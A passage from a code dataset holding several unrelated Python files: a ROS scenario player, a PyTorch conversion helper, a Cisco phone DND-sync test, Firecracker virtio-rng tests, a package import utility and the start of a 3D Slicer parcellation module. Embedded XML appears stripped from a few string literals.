v_attr_name = 'y'\n elif ref_type == 'psi_dot':\n v_attr_name = 'z'\n else:\n raise AttributeError('Invalid reference attribute {}'.format(ref_type))\n setattr(self.reference.vector, v_attr_name, ref_value)\n rospy.loginfo(\"New reference:\\n {}\".format(self.reference))\n self.reference.header.stamp = self.timestamp\n self.ref_traj_pub.publish(self.reference)\n\n if attribute == 'waypoint':\n # Read and a new reference waypoint\n rospy.loginfo('Reading new reference waypoint')\n flush = False\n\n new_wp = Marker()\n new_wp.header.stamp = self.timestamp\n new_wp.header.frame_id = 'map'\n new_wp.action = new_wp.ADD\n new_wp.type = new_wp.SPHERE\n new_wp.id = self.wp_count\n new_wp.pose.orientation.x = 0\n new_wp.pose.orientation.y = 0\n new_wp.pose.orientation.z = 0\n new_wp.pose.orientation.w = 1\n new_wp.color.r = 0\n new_wp.color.g = 1\n new_wp.color.b = 0\n new_wp.color.a = 1\n\n self.wp_count += 1\n for ref_type, ref_value in value.iteritems():\n if ref_type == 'n':\n new_wp.pose.position.x = ref_value\n elif ref_type == 'e':\n new_wp.pose.position.y = ref_value\n elif ref_type == 'd':\n new_wp.pose.position.z = ref_value\n elif ref_type == 'r':\n new_wp.scale.x = 2*ref_value\n new_wp.scale.y = 2*ref_value\n new_wp.scale.z = 2*ref_value\n elif ref_type == 'flush':\n flush = ref_value\n else:\n raise AttributeError('Invalid reference attribute {}'.format(ref_type))\n rospy.loginfo(\"New waypoint reference:\\n {}\".format(new_wp))\n self.wp_list.markers.append(new_wp)\n if flush:\n self.ref_wp_pub.publish(self.wp_list)\n\n if attribute == 'fault':\n # Signal a new fault from a predetermined set of faults\n rospy.loginfo('Publishing new fault')\n message_list = self.fg.generate_fault(value)\n for msg in message_list:\n msg.header.stamp = self.timestamp\n self.fault_pub.publish(msg)\n\n \n def popitem(self):\n while True:\n try:\n # print(self.scenario)\n _, self.pending_item = self.scenario.popitem(last=False)\n # print(self.pending_item)\n if 'time' not in self.pending_item.keys():\n rospy.logwarn('Scenario item did not specify time attribute. Popping the next one')\n raise AttributeError\n break\n except AttributeError:\n continue\n except KeyError: # OrderedDict has been exhausted\n raise StopIteration\n # else:\n # break\n\n\nif __name__ == '__main__':\n rospy.init_node('scenario_player', anonymous=True)\n rospy.loginfo('Scenario player node up')\n r = rospy.Rate(10)\n\n scenario_file = rospy.get_param('~scenario')\n\n rospack = rospkg.RosPack()\n package_path = rospack.get_path('uav_ftc')\n rospy.loginfo('Package found at {0}'.format(package_path))\n\n if scenario_file != 'none':\n\n rospy.loginfo('Playing scenario {0}'.format(scenario_file))\n full_filename = os.path.join(package_path, 'data/scenarios', scenario_file+'.json')\n rospy.loginfo('Full file name: {0}'.format(full_filename))\n\n scheduler = Scheduler(full_filename)\n\n while not rospy.is_shutdown() and not scheduler.end_reached:\n scheduler.check_time()\n r.sleep()\n\n rospy.loginfo(\"Scenario ended.\")","sub_path":"scripts/scenario_player.py","file_name":"scenario_player.py","file_ext":"py","file_size_in_byte":8106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"393946040","text":"import torch\nfrom torch.autograd import Variable\nfrom scipy.sparse.csr import csr_matrix\nfrom collections import Iterable\n\n\nclass Convert():\n def __init__(self):\n pass\n\n @staticmethod\n def to(a, cuda=False):\n if isinstance(a, Variable):\n ret = a.double()\n elif not isinstance(a, Iterable):\n ret = Variable(torch.tensor(int(a)))\n elif isinstance(a, csr_matrix):\n ret = Variable(torch.from_numpy(a.toarray()).float())\n else:\n ret = Variable(torch.tensor(a).float())\n if cuda:\n ret = ret.cuda()\n return ret\n\n# X = X.float()\n# or cast your complete model to DoubleTensor as\n#\n# model = model.double()\n# You can also set the default type for all tensors using\n#\n# pytorch.set_default_tensor_type('torch.DoubleTensor')","sub_path":"src/library/vision/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"587149767","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n##########################################################################\n# Script Header\n#\n# $Id: US25538\n#\n# Copyright (c) 2014 Cisco Systems, Inc.\n#\n# Name:\n# cmCC245538_3pcc_BS_IOT_Interop_149_ActivateDNDFromPrimaryPhone.py\n#\n# Purpose:\n# This test case verifies that the DUT is able to synchronize a Do Not\n# Disturb status change from the primary DUT phone to BroadWorks.\n#\n#\n# Description:\n# it include 1 case\n# 1: From the primary phone activate DND, check the value on the server\n# and on the alternate phone\n#\n# Test bed requirement:\n# 1: Two 3pcc Phone\n# 2: Two phones should register successfully before running script\n# 3: Feature Key sync should be enabled in both the phones\n#\n# Test Steps:\n# 1. From the primary DUT phone activate the DND\n# Verify:\n# 1. Primary phone visual status indicates that Do Not Disturb is “ON\".\n# 2. Alternate phone visual status indicates that Do Not Disturb is “ON”.\n# 3. BroadWorks Do Not Disturb service for the DUT is “ON”. Browse to\n# BroadWorks User → Incoming Calls → Do Not Disturb to confirm.\n# Verify the SIP signaling to and from the DUT.\n# 1. DUT sends a SUBSCRIBE with the Do Not Disturb setting\n# requested as “true”.\n# 2. BroadWorks responds with a 200 OK.\n# 3. BroadWorks sends a NOTIFY to the primary and alternate DUT phones\n# with the Do Not Disturb setting confirmed as “true”.\n# 4. Each DUT responds with a 200 OK.\n#\n# Known Bugs:\n#\n# End of Header\n###############################################################################\nimport tng\nimport logging\nfrom tng_sl.contrib.mpp.Toolkit3pcc import Toolkit3pcc\nfrom tng.frontend.timing import wait\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneLineRegHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneConfigHelper\nfrom tng_sl.contrib.mpp.broadsoft_login_helper import BroadsoftLoginHelper\nfrom tng_sl.contrib.mpp.tshark_helper import TsharkHelper\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng_sl.contrib.mpp.broadsoft.broadsoft_config import BroadsoftConfig\n\nlog = logging.getLogger('ActivateDNDFromPrimaryPhone')\n\n\nclass ActivateDNDFromPrimaryPhone(SetupHelpersTestCase, tng.api.TestCase):\n helpers = (\n PhoneConfigHelper, PhoneLineRegHelper, BroadsoftLoginHelper,\n TsharkHelper)\n helper_num_devices = 2\n\n def setUp(self):\n log.info(\"Start of setUp\")\n\n self.proxy = self.phone_data['proxy']\n self.shared_userID = self.user_id1 + 'b'\n self.device_type = 'Cisco-Hybrid' + self.oPhone1.get_web_status(\n 'Product_Name')[2:]\n self.serverproxy = self.bsoft_data['as_ip_addr']\n self.xsi_user_id1 = self.bsoft_data['xsi_user_id1']\n\n # Configure Shared line on Phone1\n self.broadsoft = BroadsoftConfig()\n self.shared_name = self.bsoft_web.configure_shared_line(\n shared_number=self.shared_userID, device_type=self.device_type,\n user_phone_num=self.user_id1)\n\n def broadsoft_delete_shared_line():\n self.bsoft_web.delete_shared_line(\n user_phone_num=self.user_id1, shared_name=self.shared_name)\n self.addCleanup(broadsoft_delete_shared_line)\n\n self.dnd_status_intial = self.broadsoft.get_dnd_status(\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n log.info('Initial DND status is {}'.format(self.dnd_status_intial))\n if self.dnd_status_intial == \"true\":\n self.broadsoft.set_dnd(\n active='false', user_id_proxy=self.xsi_user_id1,\n user_id=self.user_id1)\n\n def broadsoft_clear_dnd():\n self.oPhone1.enable_disable_fks_and_send_dfks_update(\n 0, 0, '', 0, '', 0, '', line=1, set_enabled=1,\n fks_enable_disable=False, dfks_update=True)\n self.broadsoft.set_dnd(\n active='false', user_id_proxy=self.xsi_user_id1,\n user_id=self.user_id1)\n self.addCleanup(broadsoft_clear_dnd)\n\n log.info(\"End of setUp\")\n\n def test_activate_dnd_primaryphone(self):\n\n log.info(\"Start of test_activate_dnd_primaryphone\")\n\n log.info(\"Configure shared line on Phone1 and Phone2\")\n self.oPhone1.set_shared_extension()\n self.oPhone2.set_shared_extension()\n self.oPhone2.set_shared_line(self.shared_userID)\n log.info(\"Enable Feature Key sync in Phone1\")\n self.oPhone1.enable_disable_fks_and_send_dfks_update(\n 0, 0, '', 0, '', 0, '', line=1, set_enabled=1,\n fks_enable_disable=True, dfks_update=False)\n log.info(\"Enable Feature Key sync in Phone2\")\n self.oPhone2.enable_disable_fks_and_send_dfks_update(\n 0, 0, '', 0, '', 0, '', line=1, set_enabled=1,\n fks_enable_disable=True, dfks_update=False)\n # check the dnd status on Phone1 and in Phone 2\n self.product_model = self.oPhone1.get_web_status('Product_Name')\n wait(5, 'wait for 5 seconds before checking for softkey')\n if '7832' not in self.product_model:\n self.verify_dnd_on_phone(self.oPhone1, 'SK_DND')\n self.verify_dnd_on_phone(self.oPhone2, 'SK_DND')\n log.info('Start tshark on linux')\n dut1_ip = self.oPhone1.ip\n dut2_ip = self.oPhone2.ip\n filter_cmd = 'port sip and (host {} or host {})'.format(\n dut1_ip, dut2_ip)\n capture_file = self.tshark.tshark_start(filter_cmd)\n # Enable DND on phone 1\n self.oPhone1.enable_disable_fks_and_send_dfks_update(\n 1, 0, '', 0, '', 0, '', line=1, set_enabled=1,\n fks_enable_disable=False, dfks_update=True)\n wait(5, 'wait for 5 seconds before checking for softkey')\n if '7832' not in self.product_model:\n self.verify_dnd_on_phone(self.oPhone1, 'SK_NDND')\n self.verify_dnd_on_phone(self.oPhone2, 'SK_NDND')\n # verify DND Setting is enabled in server\n verify_dnd = self.broadsoft.get_dnd_status(\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n self.assertEqual(verify_dnd, \"true\")\n log.info(\"stop tshark run\")\n self.tshark.tshark_stop()\n # tshark analaysis\n cseq, callid = self.tshark.tshark_get_method_cseq_call_id(\n capture_file, dut1_ip, self.serverproxy, 'Request: SUBSCRIBE')\n log.info(\"Check if Do Not Disturb setting is requested as 'true'\")\n self.tshark.tshark_check_string_in_packet_bytes(\n capture_file, src_ip=dut1_ip, dst_ip=self.serverproxy, cseq=cseq,\n call_id=callid,\n search_string=(\n 'true'),\n protocol='sip', exist=True, method='SUBSCRIBE',\n return_header=False)\n\n log.info(\"Check if 200OK is send from Server to Phone1\")\n self.tshark.tshark_verify_message_and_response_with_200OK(\n capture_file, 'Request: SUBSCRIBE', dut1_ip, self.serverproxy,\n callid)\n\n log.info(\n \"Getting CSeq and CallID for NOTIFY of \"\n \"primary phone from server\")\n cseq1, callid1 = self.tshark.tshark_get_method_cseq_call_id(\n capture_file, self.serverproxy, dut1_ip, 'Request: NOTIFY')\n log.info(\"Check if Do Not Disturb setting is requested as 'true'\")\n self.tshark.tshark_check_string_in_packet_bytes(\n capture_file, src_ip=self.serverproxy, dst_ip=dut1_ip, cseq=cseq1,\n call_id=callid1, search_string='true<',\n protocol='sip', exist=True, method='NOTIFY', return_header=False)\n log.info(\"Check if 200OK is send from Server to Phone1\")\n self.tshark.tshark_verify_message_and_response_with_200OK(\n capture_file, 'Request: NOTIFY', self.serverproxy, dut1_ip,\n callid1)\n\n log.info(\n \"Getting CSeq and CallID for NOTIFY of \"\n \"alternate phone from server\")\n cseq2, callid2 = self.tshark.tshark_get_method_cseq_call_id(\n capture_file, self.serverproxy, dut2_ip, 'Request: NOTIFY')\n log.info(\"Check if Do Not Disturb setting is requested as 'true'\")\n self.tshark.tshark_check_string_in_packet_bytes(\n capture_file, src_ip=self.serverproxy, dst_ip=dut2_ip, cseq=cseq2,\n call_id=callid2, search_string='true<',\n protocol='sip', exist=True, method='NOTIFY', return_header=False)\n log.info(\"Check if 200OK is send from Server to Phone2\")\n self.tshark.tshark_verify_message_and_response_with_200OK(\n capture_file, 'Request: NOTIFY', self.serverproxy, dut2_ip,\n callid2)\n\n log.info(\"Verified traces for ActivateDoNotDisturb\")\n log.info(\"End of test_activate_dnd_primaryphone\")\n\n def verify_dnd_on_phone(self, phone, dnd_skey):\n resp = phone.ccapi.get_mphone_state('GET_SOFTKEYS')\n for skey in resp:\n skey = skey.split(':')\n if dnd_skey in skey:\n log.info('DND is in sync with server')\n break\n else:\n raise AssertionError('DND is not in sync with server {}'.format(\n dnd_skey))\n\n\n# this is called by 'tng run'\n\ndef main():\n tng.api.runner()\n\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/IOT/Broadsoft_Interop/section_8/cc_shared/cmCC245538_3pcc_BS_IOT_Interop_149_ActivateDNDFromPrimaryPhone.py","file_name":"cmCC245538_3pcc_BS_IOT_Interop_149_ActivateDNDFromPrimaryPhone.py","file_ext":"py","file_size_in_byte":9427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"298812890","text":"# Copyright 2023 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\"\"\"Tests for the virtio-rng device\"\"\"\n\nfrom pathlib import Path\n\nimport pytest\n\nfrom framework.artifacts import NetIfaceConfig\nfrom framework.properties import global_props\nfrom framework.utils import check_entropy\n\nif global_props.instance == \"c7g.metal\" and global_props.host_linux_version == \"4.14\":\n pytestmark = pytest.mark.skip(reason=\"c7g requires no SVE 5.10 kernel\")\n\n\ndef _microvm_basic_config(microvm):\n microvm.spawn()\n microvm.basic_config()\n iface = NetIfaceConfig()\n microvm.add_net_iface(iface)\n\n\ndef _microvm_rng_config(microvm, rate_limiter=None):\n _microvm_basic_config(microvm)\n response = microvm.entropy.put(rate_limiter=rate_limiter)\n assert microvm.api_session.is_status_no_content(response.status_code), response.text\n\n\ndef _start_vm_with_rng(microvm, rate_limiter=None):\n _microvm_rng_config(microvm, rate_limiter)\n microvm.start()\n\n\ndef _start_vm_without_rng(microvm):\n _microvm_basic_config(microvm)\n microvm.start()\n\n\ndef test_rng_not_present(test_microvm_with_rng):\n \"\"\"\n Test a guest microVM *without* an entropy device and ensure that\n we cannot get data from /dev/hwrng\n \"\"\"\n\n vm = test_microvm_with_rng\n _start_vm_without_rng(vm)\n\n # If the guest kernel has been built with the virtio-rng module\n # the device should exist in the guest filesystem but we should\n # not be able to get random numbers out of it.\n cmd = \"test -e /dev/hwrng\"\n ecode, _, _ = vm.ssh.execute_command(cmd)\n assert ecode == 0\n\n cmd = \"dd if=/dev/hwrng of=/dev/null bs=10 count=1\"\n ecode, _, _ = vm.ssh.execute_command(cmd)\n assert ecode == 1\n\n\ndef test_rng_present(test_microvm_with_rng):\n \"\"\"\n Test a guest microVM with an entropy defined configured and ensure\n that we can access `/dev/hwrng`\n \"\"\"\n\n vm = test_microvm_with_rng\n _start_vm_with_rng(vm)\n\n check_entropy(vm.ssh)\n\n\ndef test_rng_snapshot(test_microvm_with_rng, microvm_factory):\n \"\"\"\n Test that a virtio-rng device is functional after resuming from\n a snapshot\n \"\"\"\n\n vm = test_microvm_with_rng\n _start_vm_with_rng(vm)\n\n check_entropy(vm.ssh)\n\n mem_path = Path(vm.jailer.chroot_path()) / \"test.mem\"\n snapshot_path = Path(vm.jailer.chroot_path()) / \"test.snap\"\n vm.pause_to_snapshot(\n mem_file_path=mem_path.name,\n snapshot_path=snapshot_path.name,\n )\n assert mem_path.exists()\n\n new_vm = microvm_factory.build()\n new_vm.spawn()\n iface = NetIfaceConfig()\n new_vm.create_tap_and_ssh_config(\n host_ip=iface.host_ip,\n guest_ip=iface.guest_ip,\n netmask_len=iface.netmask,\n tapname=iface.tap_name,\n )\n new_vm.ssh_config[\"ssh_key_path\"] = vm.ssh_config[\"ssh_key_path\"]\n new_vm.restore_from_snapshot(\n snapshot_vmstate=snapshot_path,\n snapshot_mem=mem_path,\n snapshot_disks=[vm.rootfs_file],\n )\n\n check_entropy(new_vm.ssh)\n\n\ndef _get_percentage_difference(measured, base):\n \"\"\"Return the percentage delta between the arguments.\"\"\"\n if measured == base:\n return 0\n try:\n return (abs(measured - base) / base) * 100.0\n except ZeroDivisionError:\n # It means base and only base is 0.\n return 100.0\n\n\ndef _throughput_units_multiplier(units):\n \"\"\"\n Parse the throughput units and return the multiplier that would\n translate the corresponding value to Bytes/sec\n \"\"\"\n if units == \"kB/s\":\n return 1000\n\n if units == \"MB/s\":\n return 1000 * 1000\n\n if units == \"GB/s\":\n return 1000 * 1000 * 1000\n\n raise Exception(\"Unknown units\")\n\n\ndef _process_dd_output(out):\n \"\"\"\n Parse the output of `dd` and return the achieved throughput in\n KB/sec.\n \"\"\"\n\n # Example `dd` output:\n #\n # $ dd if=/dev/hwrng of=/dev/null bs=100 count=1\n # 1+0 records in\n # 1+0 records out\n # 100 bytes (100 B) copied, 0.000749912 s, 133 kB/s\n\n # So we split the lines of the output and keep the last line.\n report = out.splitlines()[-1].split(\" \")\n\n # Last two items in the line are value and units\n (value, units) = (report[-2], report[-1])\n\n return float(value) * _throughput_units_multiplier(units) / 1000\n\n\ndef _get_throughput(ssh, random_bytes):\n \"\"\"\n Request `random_bytes` from `/dev/hwrng` and return the achieved\n throughput in KB/sec\n \"\"\"\n\n # Issue a `dd` command to request 100 times `random_bytes` from the device.\n # 100 here is used to get enough confidence on the achieved throughput.\n cmd = \"dd if=/dev/hwrng of=/dev/null bs={} count=100\".format(random_bytes)\n exit_code, _, stderr = ssh.execute_command(cmd)\n assert exit_code == 0, stderr.read()\n\n # dd gives its output on stderr\n return _process_dd_output(stderr.read())\n\n\ndef _check_entropy_rate_limited(ssh, random_bytes, expected_kbps):\n \"\"\"\n Ask for `random_bytes` from `/dev/hwrng` in the guest and check\n that achieved throughput is within a 10% of the expected throughput.\n\n NOTE: 10% is an arbitrarily selected limit which should be safe enough,\n so that we don't run into many intermittent CI failures.\n \"\"\"\n measured_kbps = _get_throughput(ssh, random_bytes)\n assert (\n _get_percentage_difference(measured_kbps, expected_kbps) <= 10\n ), \"Expected {} KB/s, measured {} KB/s\".format(expected_kbps, measured_kbps)\n\n\ndef _rate_limiter_id(rate_limiter):\n \"\"\"\n Helper function to return a name for the rate_limiter to be\n used as an id for parametrized tests.\n \"\"\"\n size = rate_limiter[\"bandwidth\"][\"size\"]\n refill_time = rate_limiter[\"bandwidth\"][\"refill_time\"]\n\n return \"{} KB/sec\".format(float(size) / float(refill_time))\n\n\n@pytest.mark.parametrize(\n \"rate_limiter\",\n [\n {\"bandwidth\": {\"size\": 1000, \"refill_time\": 100}},\n {\"bandwidth\": {\"size\": 10000, \"refill_time\": 100}},\n {\"bandwidth\": {\"size\": 100000, \"refill_time\": 100}},\n ],\n ids=_rate_limiter_id,\n)\ndef test_rng_bw_rate_limiter(test_microvm_with_rng, rate_limiter):\n \"\"\"\n Test that rate limiter without initial burst budget works\n \"\"\"\n vm = test_microvm_with_rng\n _start_vm_with_rng(vm, rate_limiter)\n\n size = rate_limiter[\"bandwidth\"][\"size\"]\n refill_time = rate_limiter[\"bandwidth\"][\"refill_time\"]\n\n expected_kbps = size / refill_time\n\n # Check the rate limiter using a request size equal to the size\n # of the token bucket.\n _check_entropy_rate_limited(vm.ssh, size, expected_kbps)\n","sub_path":"tests/integration_tests/functional/test_rng.py","file_name":"test_rng.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"338232551","text":"import os\nimport importlib\nimport logging\n\n\ntry:\n from malcolm.yamlutil import make_block_creator, make_include_creator\nexcept ImportError:\n make_creator = None\nelse:\n def make_creator(package_name):\n if package_name.startswith(\"malcolm.blocks.\"):\n return make_block_creator\n elif package_name.startswith(\"malcolm.includes.\"):\n return make_include_creator\n\n\ndef try_import_module(import_name):\n logging.debug(\"Importing %s\", import_name)\n try:\n return importlib.import_module(import_name)\n except Exception:\n logging.info(\"Importing %s failed\", import_name, exc_info=True)\n\n\ndef find_method_meta_decorated(module):\n for n in dir(module):\n cls = getattr(module, n)\n module_name = module.__name__.split(\".\")[-1]\n if n.lower() == module_name:\n if hasattr(cls, \"MethodMeta\"):\n logging.debug(\"Found child class %s\", cls)\n yield cls.__name__, cls\n\n\ndef find_package_contents(package_name, package_fs_path, fname):\n if fname.endswith(\".py\") and fname != \"__init__.py\":\n # import it and see what it produces\n import_name = \"%s.%s\" % (package_name, fname[:-3])\n logging.debug(\"Importing %s\", import_name)\n module = try_import_module(import_name)\n if module:\n for cls_name, cls in find_method_meta_decorated(module):\n yield cls_name, cls\n\n elif os.path.isdir(os.path.join(package_fs_path, fname)):\n # import it and add it to the list\n import_name = \"%s.%s\" % (package_name, fname)\n module = try_import_module(import_name)\n if module:\n yield fname, module\n elif fname.endswith(\".yaml\"):\n # check we need to do something with it\n creator = make_creator(package_name)\n if creator:\n # load the yaml file and make an assembly out of it\n split = fname.split(\".\")\n assert len(split) == 2, \\\n \"Expected .yaml, got %r\" % fname\n yaml_path = os.path.join(package_fs_path, fname)\n logging.debug(\"Parsing %s\", yaml_path)\n with open(yaml_path) as f:\n text = f.read()\n try:\n func = creator(text)\n except Exception:\n logging.exception(\"Creating object from %s failed\", fname)\n else:\n yield split[0], func\n\n\ndef prepare_package(globals_d, package_name):\n \"\"\"Prepare a package namespace by importing all subclasses following PEP8\n rules that have @takes decorated functions, and all subpackages\"\"\"\n __all__ = prepare_globals_for_package(\n globals_d, package_name, find_package_contents)\n return __all__\n\n\ndef prepare_globals_for_package(globals_d, package_name, finder):\n\n update_dict = {}\n\n # this is the path to the package\n package_relative = package_name.split(\".\")[1:]\n package_fs_path = os.path.join(os.path.dirname(__file__), *package_relative)\n\n for f in os.listdir(package_fs_path):\n for name, ob in finder(package_name, package_fs_path, f):\n update_dict[name] = ob\n\n globals_d.update(update_dict)\n __all__ = list(update_dict)\n return __all__\n","sub_path":"malcolm/packageutil.py","file_name":"packageutil.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"585901181","text":"\nimport os\nimport unittest\nimport string\nimport vtk, qt, ctk, slicer\nfrom slicer.ScriptedLoadableModule import *\nfrom slicer.util import VTKObservationMixin\nimport logging\n\nfrom NeuroSegmentParcellationLibs.NeuroSegmentParcellationLogic import NeuroSegmentParcellationLogic\nfrom NeuroSegmentParcellationLibs.NeuroSegmentOutputToolWidget import NeuroSegmentOutputToolWidget\nfrom NeuroSegmentParcellationLibs.NeuroSegmentInputMarkupsWidget import NeuroSegmentInputMarkupsWidget\nfrom NeuroSegmentParcellationLibs.NeuroSegmentInputMarkupsFrame import NeuroSegmentInputMarkupsFrame\n\nclass NeuroSegmentParcellation(ScriptedLoadableModule, VTKObservationMixin):\n\n NEURO_PARCELLATION_LAYOUT_ID = 5613\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n VTKObservationMixin.__init__(self)\n self.parent.title = \"Neuroparcellation\"\n self.parent.categories = [\"HOA 2\", \"Neuro Segmentation and Parcellation\", \"Segmentation\"]\n self.parent.dependencies = [\"FreeSurferMarkups\"]\n self.parent.contributors = [\"Kyle Sunderland (Perk Lab, Queen's University)\"]\n self.parent.helpText = \"\"\"\nThis module can be used to create a surfaced based parcellation of FreeSurfer surfaces.\n\"\"\" # TODO: Add more help text + link to documentation.\n self.parent.helpText += self.getDefaultModuleDocumentationLink()\n self.parent.acknowledgementText = \"\"\"\nThis file was originally developed by Kyle Sunderland (Perk Lab, Queen's University), and was partially funded by Brigham and Women's Hospital through NIH grant R01MH112748\n\"\"\"\n if not slicer.app.commandOptions().noMainWindow:\n slicer.app.connect(\"startupCompleted()\", self.initializeModule)\n\n def initializeModule(self):\n #slicer.mrmlScene.SetUndoOn()\n defaultNodes = [\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLMarkupsFiducialNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLMarkupsCurveNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLMarkupsLineNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLMarkupsAngleNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLMarkupsClosedCurveNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLLinearTransformNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLCameraNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLViewNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLSliceNode\"),\n ]\n for node in defaultNodes:\n node.UnRegister(None)\n\n for node in defaultNodes:\n node.UndoEnabledOn()\n slicer.mrmlScene.AddDefaultNode(node)\n self.setUndoOnExistingNodes()\n self.addObserver(slicer.mrmlScene, slicer.mrmlScene.EndImportEvent, self.setUndoOnExistingNodes)\n self.addObserver(slicer.mrmlScene, slicer.mrmlScene.EndCloseEvent, self.setUndoOnExistingNodes)\n\n # Setup shortcuts\n # TODO: When shortcuts are renabled in Slicer, the following section should be removed.\n def onRedo():\n slicer.mrmlScene.Redo()\n\n def onUndo():\n slicer.mrmlScene.Undo()\n\n redoShortcuts = []\n redoKeyBindings = qt.QKeySequence.keyBindings(qt.QKeySequence.Redo)\n for redoBinding in redoKeyBindings:\n redoShortcut = qt.QShortcut(slicer.util.mainWindow())\n redoShortcut.setKey(redoBinding)\n redoShortcut.connect(\"activated()\", onRedo)\n redoShortcuts.append(redoShortcut)\n\n undoShortcuts = []\n undoKeyBindings = qt.QKeySequence.keyBindings(qt.QKeySequence.Undo)\n for undoBinding in undoKeyBindings:\n undoShortcut = qt.QShortcut(slicer.util.mainWindow())\n undoShortcut.setKey(undoBinding)\n undoShortcut.connect(\"activated()\", onUndo)\n undoShortcuts.append(undoShortcut)\n\n self.setupLayout()\n\n @vtk.calldata_type(vtk.VTK_OBJECT)\n def setUndoOnExistingNodes(self, caller=None, eventId=None, node=None):\n # Camera nodes are not created using default\n cameraNodes = slicer.util.getNodesByClass(\"vtkMRMLCameraNode\")\n for cameraNode in cameraNodes:\n cameraNode.UndoEnabledOn()\n\n def setupLayout(self):\n layout = ('''\n\n \n \n \n \n O\n \n \n \n \n P\n \n \n \n \n I\n \n \n \n \n \n \n \n \n Axial\n R\n #F34A33\n \n \n \n \n Sagittal\n G\n #6EB04B\n \n \n \n \n Coronal\n Y\n #EDD54C\n \n \n \n \n''')\n layoutManager = slicer.app.layoutManager()\n layoutManager.layoutLogic().GetLayoutNode().AddLayoutDescription(\n NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID, layout)\n\nclass NeuroSegmentParcellationWidget(ScriptedLoadableModuleWidget, VTKObservationMixin):\n\n def __init__(self, parent):\n ScriptedLoadableModuleWidget.__init__(self, parent)\n VTKObservationMixin.__init__(self)\n self.logic = None\n self.parameterNode = None\n self.outputModelsWidget = None\n self.addObserver(slicer.mrmlScene, slicer.mrmlScene.EndImportEvent, self.onEndImportEvent)\n\n def setup(self):\n ScriptedLoadableModuleWidget.setup(self)\n\n # Load widget from .ui file (created by Qt Designer)\n uiWidget = slicer.util.loadUI(self.resourcePath('UI/NeuroSegmentParcellation.ui'))\n self.layout.addWidget(uiWidget)\n self.ui = slicer.util.childWidgetVariables(uiWidget)\n\n self.importTypeButtonGroup = qt.QButtonGroup()\n self.importTypeButtonGroup.addButton(self.ui.markupRadioButton)\n self.importTypeButtonGroup.addButton(self.ui.overlayRadioButton)\n\n self.importCountButtonGroup = qt.QButtonGroup()\n self.importCountButtonGroup.addButton(self.ui.singleOverlayRadioButton)\n self.importCountButtonGroup.addButton(self.ui.multipleOverlayRadioButton)\n\n self.ui.intersectionGlyphComboBox.addItem(\"Star burst\", slicer.vtkMarkupsGlyphSource2D.GlyphStarBurst)\n self.ui.intersectionGlyphComboBox.addItem(\"Cross\", slicer.vtkMarkupsGlyphSource2D.GlyphCross)\n self.ui.intersectionGlyphComboBox.addItem(\"Cross dot\", slicer.vtkMarkupsGlyphSource2D.GlyphCrossDot)\n self.ui.intersectionGlyphComboBox.addItem(\"Thick cross\", slicer.vtkMarkupsGlyphSource2D.GlyphThickCross)\n self.ui.intersectionGlyphComboBox.addItem(\"Dash\", slicer.vtkMarkupsGlyphSource2D.GlyphDash)\n self.ui.intersectionGlyphComboBox.addItem(\"Circle\", slicer.vtkMarkupsGlyphSource2D.GlyphCircle)\n self.ui.intersectionGlyphComboBox.addItem(\"Vertex\", slicer.vtkMarkupsGlyphSource2D.GlyphVertex)\n self.ui.intersectionGlyphComboBox.addItem(\"Triangle\", slicer.vtkMarkupsGlyphSource2D.GlyphTriangle)\n self.ui.intersectionGlyphComboBox.addItem(\"Square\", slicer.vtkMarkupsGlyphSource2D.GlyphSquare)\n self.ui.intersectionGlyphComboBox.addItem(\"Diamond\", slicer.vtkMarkupsGlyphSource2D.GlyphDiamond)\n self.ui.intersectionGlyphComboBox.addItem(\"Arrow\", slicer.vtkMarkupsGlyphSource2D.GlyphArrow)\n self.ui.intersectionGlyphComboBox.addItem(\"Thick arrow\", slicer.vtkMarkupsGlyphSource2D.GlyphThickArrow)\n self.ui.intersectionGlyphComboBox.addItem(\"Hooked arrow\", slicer.vtkMarkupsGlyphSource2D.GlyphHookedArrow)\n\n # Set scene in MRML widgets. Make sure that in Qt designer\n # \"mrmlSceneChanged(vtkMRMLScene*)\" signal in is connected to each MRML widget's.\n # \"setMRMLScene(vtkMRMLScene*)\" slot.\n uiWidget.setMRMLScene(slicer.mrmlScene)\n\n # Create a new parameterNode\n # This parameterNode stores all user choices in parameter values, node selections, etc.\n # so that when the scene is saved and reloaded, these settings are restored.\n self.logic = NeuroSegmentParcellationLogic()\n self.logic.setQueryNodeFileName(self.resourcePath('Parcellation/parcellation.qry'))\n self.ui.parameterNodeSelector.addAttribute(\"vtkMRMLScriptedModuleNode\", \"ModuleName\", self.moduleName)\n\n self.inputCurvesWidget = NeuroSegmentInputMarkupsFrame(self.logic, \"vtkMRMLMarkupsCurveNode\")\n 